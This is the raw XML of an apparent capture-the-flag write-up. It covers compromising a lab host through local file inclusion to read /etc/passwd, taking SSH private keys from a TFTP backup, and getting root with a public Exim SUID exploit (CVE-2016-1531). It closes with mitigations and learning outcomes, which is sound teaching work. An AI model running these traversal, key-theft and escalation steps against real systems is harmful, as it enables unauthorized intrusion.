            <wp:docPr id="1312245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24508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5607B" w14:textId="2DD0FC8E" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B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  <w:t>Exploitation Phase (LFI)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262326A7" w14:textId="77777777" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B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Used Local File Inclusion to access system files:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8E9196" w14:textId="77777777" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6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BB6B9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http://172.20.10.2/index.php?page</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB6B9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=../../../..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB6B9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/etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5173F4D1" w14:textId="77777777" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B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Successfully retrieved system user information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6883E125" w14:textId="4E50B9CE" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="000C75F8" w:rsidP="00BB6B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IN" w:bidi="kn-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09F4ED01" wp14:editId="7E87C33A">
            <wp:extent cx="5731510" cy="2997200"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="163497230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97230" name="Picture 163497230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145E0" w14:textId="033E4B79" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B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7CC25865" w14:textId="77777777" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B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Further exploitation revealed backup script:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C61978" w14:textId="77777777" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6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BB6B9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lastRenderedPageBreak/>
        <w:t>/usr/local/scripts/backup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CBF752" w14:textId="127F220C" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="000C75F8" w:rsidP="00BB6B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IN" w:bidi="kn-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3249E9DF" wp14:editId="577D5737">
            <wp:extent cx="5731510" cy="2997200"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1340619451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619451" name="Picture 134061945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BDFC2" w14:textId="07E2090C" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B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2523B639" w14:textId="45759560" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B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  <w:t>TFTP Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66126AA4" w14:textId="77777777" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B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Connected to TFTP service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B920FC9" w14:textId="77777777" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB6B9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tftp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB6B9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 xml:space="preserve"> 172.20.10.2</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB6B9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br/>
        <w:t>get backup.tar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7475AC" w14:textId="77777777" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B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Extracted backup file locally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D337CD" w14:textId="4C80F5F0" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="000C75F8" w:rsidP="00BB6B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0A67D986" wp14:editId="42886A46">
            <wp:extent cx="5731510" cy="2996565"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1008298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29802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09806" w14:textId="0581CBA9" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B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60A5153D" w14:textId="4AF05549" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B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  <w:lastRenderedPageBreak/>
        <w:t>Backup Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382CB70D" w14:textId="77777777" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B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Extracted contents revealed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26774B29" w14:textId="77777777" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B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• </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB6B9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/home/paul/keys/</w:t>
      </w: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 directory</w:t>
      </w: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Multiple SSH private keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498B2AC7" w14:textId="1E5DD1CD" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="000C75F8" w:rsidP="00BB6B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IN" w:bidi="kn-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1046737A" wp14:editId="53008F11">
            <wp:extent cx="5731510" cy="2997200"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="521851205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851205" name="Picture 521851205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92B26" w14:textId="69305A57" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="000C75F8" w:rsidP="00BB6B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7F06A121" wp14:editId="2409DAF3">
            <wp:extent cx="5731510" cy="3149600"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1256318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31871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43E18" w14:textId="77777777" w:rsidR="000C75F8" w:rsidRDefault="000C75F8" w:rsidP="00BB6B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</w:p>
    <w:p w14:paraId="7F1061DA" w14:textId="77777777" w:rsidR="000C75F8" w:rsidRDefault="000C75F8" w:rsidP="00BB6B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</w:p>
    <w:p w14:paraId="7DA90CF8" w14:textId="5AAECD8C" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B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  <w:lastRenderedPageBreak/>
        <w:t>Initial Access (SSH)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596380D3" w14:textId="77777777" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B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Tried SSH with keys:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59520CDF" w14:textId="77777777" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6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BB6B9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ssh paul@172.20.10.2 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB6B9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i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB6B9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 xml:space="preserve"> id_key4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC4A845" w14:textId="77777777" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B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Fixed permission issue:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02783011" w14:textId="77777777" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB6B9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chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB6B9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 xml:space="preserve"> 600 id_key4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D8BD36" w14:textId="77777777" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B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Successfully logged in as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DFB3EF" w14:textId="77777777" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6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BB6B9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paul</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AF4EDC" w14:textId="46E36E96" w:rsidR="00BB6B92" w:rsidRDefault="000C75F8" w:rsidP="000C75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IN" w:bidi="kn-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E163C2C" wp14:editId="329681DB">
            <wp:extent cx="5731510" cy="2997200"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="501464090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464090" name="Picture 501464090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C7D5B" w14:textId="4EBE9417" w:rsidR="000C75F8" w:rsidRPr="00BB6B92" w:rsidRDefault="000C75F8" w:rsidP="000C75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IN" w:bidi="kn-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00442255" wp14:editId="06BD98AB">
            <wp:extent cx="5731510" cy="2997200"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="345731810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731810" name="Picture 345731810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12942" w14:textId="14750971" w:rsidR="00BB6B92" w:rsidRDefault="000C75F8" w:rsidP="00BB6B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IN" w:bidi="kn-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68F7EDD1" wp14:editId="1A064FE9">
            <wp:extent cx="5731510" cy="5946775"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="154248420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484207" name="Picture 154248420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4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3F7FB" w14:textId="77777777" w:rsidR="000C75F8" w:rsidRDefault="000C75F8" w:rsidP="00BB6B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18186168" w14:textId="4F75B222" w:rsidR="000C75F8" w:rsidRPr="00BB6B92" w:rsidRDefault="000C75F8" w:rsidP="00BB6B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713FB2F7" wp14:editId="64CFFEB9">
            <wp:extent cx="5731510" cy="1590040"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1508294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29485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517C4" w14:textId="77777777" w:rsidR="000C75F8" w:rsidRDefault="000C75F8" w:rsidP="00BB6B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</w:p>
    <w:p w14:paraId="2D165589" w14:textId="77777777" w:rsidR="000C75F8" w:rsidRDefault="000C75F8" w:rsidP="00BB6B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</w:p>
    <w:p w14:paraId="4148B2ED" w14:textId="42ED850E" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B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  <w:lastRenderedPageBreak/>
        <w:t>Privilege Escalation Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0501CC" w14:textId="77777777" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B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Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64229E76" w14:textId="77777777" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6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BB6B9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find / -perm -u=s -type f 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F260D47" w14:textId="77777777" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B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Found interesting binary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D832AA" w14:textId="77777777" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6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BB6B9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exim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11371FDE" w14:textId="74A7F56F" w:rsidR="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B92">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35EC0F43" w14:textId="2EACD12A" w:rsidR="000C75F8" w:rsidRPr="00BB6B92" w:rsidRDefault="000C75F8" w:rsidP="00BB6B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36E1043C" wp14:editId="148A3795">
            <wp:extent cx="5731510" cy="3479165"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="978013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01367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E4205" w14:textId="6C04FE4F" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B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  <w:t>Exploit Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C78067" w14:textId="77777777" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B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Used searchsploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7195A6F0" w14:textId="77777777" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6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BB6B9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searchsploit exim 4.84</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153235E2" w14:textId="77777777" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B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Found exploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26343D06" w14:textId="34D9DD2B" w:rsidR="00BB6B92" w:rsidRPr="00847F1E" w:rsidRDefault="00BB6B92" w:rsidP="000C75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BB6B9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CVE-2016-1531</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0459A851" w14:textId="77777777" w:rsidR="000C75F8" w:rsidRDefault="000C75F8" w:rsidP="000C75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kn-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F4517CE" w14:textId="77777777" w:rsidR="000C75F8" w:rsidRDefault="000C75F8" w:rsidP="000C75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11639E21" wp14:editId="768700C5">
            <wp:extent cx="5731510" cy="1562100"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="916211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21159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C0BF6" w14:textId="17602A57" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="000C75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  <w:lastRenderedPageBreak/>
        <w:t>Exploit Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2388F2" w14:textId="77777777" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B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Located exploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D49AF0A" w14:textId="77777777" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6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BB6B9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/usr/share/exploitdb/exploits/linux/local/39535.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E0B7E8" w14:textId="3EB11835" w:rsidR="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B92">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73C2D547" w14:textId="33DE02B4" w:rsidR="000C75F8" w:rsidRPr="00BB6B92" w:rsidRDefault="000C75F8" w:rsidP="00BB6B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671A958B" wp14:editId="01E7F3C1">
            <wp:extent cx="5076190" cy="4761905"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="1117399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39994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76190" cy="47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C13E1" w14:textId="20305C65" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B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  <w:t>Privilege Escalation (Root)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499354FC" w14:textId="77777777" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343034DE" w14:textId="77777777" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6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BB6B9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cd /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB6B9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tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB6B9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br/>
        <w:t>vi exploit.sh</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB6B9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br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB6B9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chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB6B9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 xml:space="preserve"> +x exploit.sh</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB6B9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br/>
        <w:t>./exploit.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38690303" w14:textId="77777777" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B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Successfully gained root shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774DAF40" w14:textId="280CF587" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="000C75F8" w:rsidP="00BB6B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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1434089F" wp14:editId="6BDEEBAC">
            <wp:extent cx="5731510" cy="1471295"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="776170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17028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58568" w14:textId="7A555D37" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B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  <w:t>Root Flag Capture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2BC305" w14:textId="77777777" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B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Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E5614C" w14:textId="77777777" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6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BB6B9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cd /root</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB6B9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br/>
        <w:t>ls</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB6B9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br/>
        <w:t>cat flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D26938" w14:textId="77777777" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B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Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371B3D32" w14:textId="77777777" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6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BB6B9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Congratulations you found the flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582C6935" w14:textId="6439C748" w:rsidR="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B92">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E52CCFC" w14:textId="29426831" w:rsidR="00847F1E" w:rsidRPr="00847F1E" w:rsidRDefault="000C75F8" w:rsidP="00847F1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395CEAA1" wp14:editId="3CA1EF11">
            <wp:extent cx="4323809" cy="4980952"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="1684376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37671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23809" cy="49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A3AE6" w14:textId="77777777" w:rsidR="00847F1E" w:rsidRDefault="00847F1E" w:rsidP="00BB6B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</w:p>
    <w:p w14:paraId="3ACD0CB7" w14:textId="098EA7DB" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B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  <w:t>Flags Summary</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5152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0"/>
        <w:gridCol w:w="4012"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w14:paraId="07685988" w14:textId="77777777" w:rsidTr="00847F1E">
        <w:trPr>
          <w:trHeight w:val="449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6DA8FC" w14:textId="77777777" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B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</w:pPr>
            <w:r w:rsidRPr="00BB6B9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  <w:t>Flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74F8C9F3" w14:textId="77777777" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B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</w:pPr>
            <w:r w:rsidRPr="00BB6B9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  <w:t>Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w14:paraId="4EE5895F" w14:textId="77777777" w:rsidTr="00847F1E">
        <w:trPr>
          <w:trHeight w:val="449"/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="493F5966" w14:textId="77777777" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B9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BB6B92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Root Flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E55713A" w14:textId="77777777" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B9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</w:pPr>
            <w:r w:rsidRPr="00BB6B9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  <w:t>Congratulations you found the flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="56D3F068" w14:textId="179F00C2" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B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06E575C0" w14:textId="77777777" w:rsidR="00847F1E" w:rsidRDefault="00847F1E" w:rsidP="00BB6B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</w:p>
    <w:p w14:paraId="1BBA9907" w14:textId="2A7C8ACC" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B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  <w:t>Vulnerability Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608D73D0" w14:textId="77777777" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B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• Local File Inclusion (LFI)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB6B92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br/>
        <w:t>• Exposed backup files</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB6B92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br/>
        <w:t>• Weak file permissions</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB6B92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br/>
        <w:t>• SSH key leakage</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB6B92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br/>
        <w:t>• Vulnerable Exim version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7DC35D" w14:textId="77777777" w:rsidR="00847F1E" w:rsidRDefault="00847F1E" w:rsidP="00BB6B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</w:p>
    <w:p w14:paraId="0F57FFDE" w14:textId="26AB8799" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B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  <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFF9009" w14:textId="77777777" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B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An attacker can:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10457F71" w14:textId="77777777" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B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• Access sensitive files</w:t>
      </w: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Extract private SSH keys</w:t>
      </w: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Gain unauthorized access</w:t>
      </w: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Escalate privileges to root</w:t>
      </w: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Fully compromise the system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596F27F4" w14:textId="77777777" w:rsidR="00847F1E" w:rsidRDefault="00847F1E" w:rsidP="00BB6B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</w:p>
    <w:p w14:paraId="309DE538" w14:textId="1BC115D4" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B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  <w:t>Mitigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346F5136" w14:textId="77777777" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B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• Patch Exim vulnerability</w:t>
      </w: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Disable directory listing</w:t>
      </w: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Secure backup storage</w:t>
      </w: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Restrict file permissions</w:t>
      </w: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Validate user inputs (prevent LFI)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02016318" w14:textId="77777777" w:rsidR="00847F1E" w:rsidRDefault="00847F1E" w:rsidP="00BB6B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</w:p>
    <w:p w14:paraId="4DD64888" w14:textId="77777777" w:rsidR="00847F1E" w:rsidRDefault="00847F1E" w:rsidP="00BB6B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</w:p>
    <w:p w14:paraId="57741783" w14:textId="4DB5ADB8" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B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  <w:lastRenderedPageBreak/>
        <w:t>Learning Outcomes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB6CE6A" w14:textId="77777777" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B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This challenge demonstrates:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F197978" w14:textId="77777777" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B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• Web enumeration techniques</w:t>
      </w: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LFI exploitation</w:t>
      </w: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Credential harvesting</w:t>
      </w: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SSH key abuse</w:t>
      </w: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Privilege escalation via SUID</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB6B92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Real-world attack chaining</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C2231B" w14:textId="12B4814E" w:rsidR="00B077AB" w:rsidRPr="00DA1C91" w:rsidRDefault="00B077AB" w:rsidP="00BB6B92">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00B077AB" w:rsidRPr="00DA1C91" w:rsidSect="008D6BB5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5DD7AB" w14:textId="77777777" w:rsidR="00903D9D" w:rsidRDefault="00903D9D" w:rsidP="006B74F2">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6810B369" w14:textId="77777777" w:rsidR="00903D9D" w:rsidRDefault="00903D9D" w:rsidP="006B74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5B13ED" w14:textId="77777777" w:rsidR="00903D9D" w:rsidRDefault="00903D9D" w:rsidP="006B74F2">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4F1003C6" w14:textId="77777777" w:rsidR="00903D9D" w:rsidRDefault="00903D9D" w:rsidP="006B74F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B7066"/>
